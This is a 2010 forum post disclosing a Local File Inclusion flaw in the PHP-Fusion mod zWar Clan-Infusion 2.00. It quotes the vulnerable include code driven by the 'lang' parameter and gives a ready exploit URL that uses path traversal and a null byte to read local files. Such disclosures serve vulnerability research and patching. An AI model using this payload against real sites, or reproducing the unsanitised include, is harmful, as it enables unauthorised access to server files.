Показать сообщение отдельно
Старый 05.07.2010, 16:42   #3
RulleR
 
Аватар для RulleR
 
Регистрация: 04.07.2010
Сообщений: 39
Репутация: 58
По умолчанию PHP-Fusion MOD [zWar Clan-Infusion] Local File Inclusion Vulnerability

MOD name: zWar Clan-Infusion (download)
Version: 2.00

Local File Inclusion

Vuln file: /infusions/zwar_warscript/fight_us.php
PHP код:
/*...*/
if (isset($_GET['lang']) && !file_exists(INFUSIONS."zwar_warscript/locale/".$_GET['lang'].".php")) { redirectBASEDIR.'index.php' ); }
$lang = isset($_GET['lang']) ? $_GET['lang'] : "";
/*...*/
if (file_exists(INFUSIONS."zwar_warscript/locale/".$lang.".php")) {
    include 
INFUSIONS."zwar_warscript/locale/".$lang.".php";
}
/*...*/ 
Need: magic_quotes = Off
Exploit:
Код:
http://[host]/[path]/zwar.php?page=fight_us&lang=../../../../../[local_file]%00
RulleR вне форума   Ответить с цитированием